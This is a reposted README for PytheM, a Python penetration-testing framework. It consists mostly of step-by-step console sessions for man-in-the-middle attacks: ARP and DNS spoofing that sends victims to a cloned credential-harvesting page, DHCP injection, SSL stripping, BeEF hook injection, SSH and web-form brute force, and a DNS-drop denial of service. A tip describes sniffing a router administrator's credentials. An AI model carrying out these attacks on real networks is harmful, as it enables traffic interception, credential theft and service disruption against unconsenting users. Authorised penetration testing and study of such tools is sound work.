PytheM: Penetration Testing Framework

PytheM is a python multi-purpose pentest framework. It has been developed in the hope that it will be useful and I don’t take responsibility for any misapplication of it. Only runs on GNU/Linux OS.

Installation

$sudo apt-get install build-essential python-dev python-capstone libnetfilter-queue-dev libffi-dev libssl-dev tcpdump
$sudo apt-get update
$sudo apt-get install build-essential python-dev tcpdump python-capstone
$sudo apt-get install libnetfilter-queue-dev libffi-dev libssl-dev
$sudo git clone https://github.com/m4n3dw0lf/PytheM
$cd PytheM
$sudo pip install -r requirements.txt 
Run with:
$sudo ./pythem.py

 Usage

ARP spoofing – Man-in-the-middle

pythem> set interface
[+] Enter the interface: wlan0
pythem> set gateway
[+] Enter the gateway: 192.168.1.1
pythem> arpspoof start
[+] Setting the packet forwarding.
[+] Iptables redefined.
[+] ARP spoofing initialized.
pythem> sniff
[+] Enter the filter: core

ARP+DNS spoof – fake page redirect to credential harvester

  • use SET or any other site cloner to clone the site of your choice and host in the apache2
pythem> set target
[+] Enter the target(s): 192.168.0.8
pythem> set interface wlan0
pythem> set gateway 192.168.0.1
pythem> arpspoof start
[+] Setting the packet forwarding.
[+] Iptables redefined.
[+] ARP spoofing initialized.
pythem> dnsspoof start
[!] Type all to spoof all domains
[+] Domain to be spoofed: www.domainame.com
[+] Default address to redirect is:192.168.0.6 do you want to change?[y/n]n
[+] DNS spoofing initialized.
pythem> sniff core

Man-in-the-middle DHCP spoofing – DHCP ACK Injection

pythem> dhcpspoof start
[+] DHCP Server IP address: 192.168.1.1
[+] Broadcast address: 192.168.1.255
[+] Subnet mask: 255.255.255.0
[+] Router IP address: 192.168.1.1
[+] Domain: home
[+] DNS Server IP address: 192.168.1.4 (fake)
[+] DHCP spoofing initialized.
pythem> sniff core

Man-in-the-middle HSTS bypass – Strip SSL

pythem> set interface wlan0
pythem> set gateway 192.168.0.1
pythem> set target 192.168.0.8
pythem> hstsbypass
[*] SSLKill initialized
|_by: m4n3dw0lf
pythem> sniff core

Man-in-the-middle inject BeEF hook

  • Start BeEF xss framework and get the hook script url
 pythem> set interface wlan0
pythem> set target 192.168.1.8
pythem> set gateway 192.168.1.1
pythem> arpspoof start
[*] Iptables redefined
[*] Setting the packet forwarding.
[+] ARP spoofing initialized.
pythem> inject start
[+] Enter the script source: http://192.168.1.6:3000/hook.js
[+] Script Injection initialized.
[+] Injection URL - http://192.168.1.6:80
[+] Script Injected on:  ('192.168.1.8', 34310)

SSH Brute-Force attack

pythem> service ssh start
pythem> set target 
[+] Enter the target(s): 127.0.0.1
pythem> set file wordlist.txt
pythem> brute-force ssh
[+] Enter the username to bruteforce: anon123

Web page formulary brute-force

  • First get the source of the web page formulary and get the id= value of the login and password.
  • Show the redirect results of the attempt so if goes to a different page may have worked.
pythem> set target http://127.0.0.1/
pythem> set file
[+] Enter the path to the file: wordlist.txt
pythem> brute-force webform
[+] Brute-Form authentication initialized.
[+] Enter the input id of the username box: vSIS_ID
[+] Enter the input id of the password box: vSIS_PASS
[+] Enter the username to brute-force the formulary: root

URL content buster

pythem> set target
[+] Enter the target(s): http://testphp.vulnweb.com/index.php?id=
pythem> set file 1to100.txt
pythem> brute-force url
[+] Content URL bruter initialized.

Overthrow the DNS of LAN range/IP address

Can be useful overthrow the DNS to force the administrator connection with his credentials in the HTTP server of the router to check what’s happening while the sniffer is running kk.

pythem> set interface wlan0
pythem> set gateway 192.168.1.1
pythem> arpspoof start
[*] Iptables redefined
[*] Setting the packet forwarding.
[+] ARP spoofing initialized.
pythem> dos dnsdrop
[+] Man-in-the-middle DNS drop initialized.
pythem> sniff core

Redirect all possible DNS queries to host

Tip: start apache2 or any other web server with your best hax0r3d html message.

If your network pass through a proxy you can add the rule:

iptables -t nat -A PREROUTING -p tcp –dport PROXY_PORT -j REDIRECT –to-ports 80

pythem> set interface wlan0
pythem> set gateway 10.0.0.1
pythem> arpspoof start
[*] Iptables redefined
[*] Setting the packet forwarding.
[+] ARP spoofing initialized.
pythem> dnsspoof start
[!] Type all to spoof all domains
[+] Domain to be spoofed: all
[+] Default address to redirect is:10.0.0.3 do you want to change?[y/n]n
[+] DNS spoofing initialized

Source: Github

 

 

 

 

Πηγή : securityonline

Anastasis Vasileiadis

PC Technical || Penetration Tester || Ethical Hacker || Cyber Security Expert || Cyber Security Analyst || Information Security Researcher || Malware analyst || Malware Investigator || Reverse Engineering

Leave a Reply

SC ProDefence SRL - Cyber Security Services